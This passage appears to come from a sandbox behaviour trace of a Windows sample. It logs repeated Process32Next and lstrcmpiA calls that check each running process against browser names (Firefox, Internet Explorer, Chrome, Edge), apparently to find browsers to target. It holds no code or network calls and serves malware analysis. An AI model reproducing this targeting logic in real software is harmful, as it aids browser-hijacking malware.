dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.101] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.101] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.101] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.101] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.102] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.102] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.102] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.102] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.102] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.102] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0165.103] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0165.103] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0165.103] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0165.103] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.103] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0165.141] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0165.141] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0165.142] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0165.142] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.142] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0165.142] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0165.142] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0165.142] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0165.142] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.142] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.143] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.143] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.143] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.143] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.143] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0165.143] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0165.143] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0165.144] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0165.144] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.144] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0165.144] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0165.144] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0165.144] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0165.144] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.144] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0165.145] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0165.145] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0165.145] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0165.145] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.145] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0165.145] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0165.145] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0165.145] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0165.146] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.146] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0165.146] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0165.146] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0165.146] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0165.146] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.146] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0165.147] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0165.147] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0165.147] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0165.147] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.147] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0165.147] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0165.147] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0165.148] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0165.148] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.148] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0165.148] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0165.148] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0165.148] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0165.148] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.148] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0165.149] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0165.149] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0165.149] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0165.149] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.149] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0165.149] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0165.149] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0165.149] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0165.150] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.150] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0165.150] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0165.150] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0165.150] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0165.150] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.150] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0165.151] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0165.151] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0165.151] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0165.151] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.151] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0165.152] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0165.152] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0165.152] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0165.152] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.152] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0165.152] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0165.152] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0165.152] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0165.152] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.152] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0165.153] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0165.153] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0165.153] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0165.153] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.153] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0165.154] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0165.154] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0165.154] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0165.154] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.154] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0165.154] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0165.154] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0165.154] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0165.154] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.154] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0165.155] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0165.155] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0165.155] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0165.155] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.155] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0165.155] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0165.155] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0165.155] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0165.156] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.156] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0165.156] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0165.156] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0165.156] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0165.156] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.156] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0165.157] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0165.157] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0165.157] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0165.157] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.157] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0165.157] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0165.157] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0165.157] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0165.157] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.157] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0165.158] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0165.158] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0165.158] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0165.158] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.158] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.337] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.337] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.337] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.337] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.338] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0165.338] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0165.338] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0165.338] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0165.338] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.338] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.339] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.339] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.339] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.339] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.339] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0165.340] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0165.340] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0165.340] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0165.340] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.340] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.340] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.340] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.340] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.340] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.340] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0165.341] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0165.341] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0165.341] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0165.341] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.341] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0165.342] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0165.342] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0165.342] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0165.342] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.342] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0165.342] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0165.342] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0165.342] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0165.342] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.343] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0165.343] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0165.343] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0165.343] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0165.343] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.343] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0165.344] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0165.344] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0165.344] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0165.344] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.344] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0165.345] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0165.345] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0165.345] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0165.345] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.345] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0165.345] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0165.345] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0165.345] lstrcmpiA (lpString1="explorer.exe", 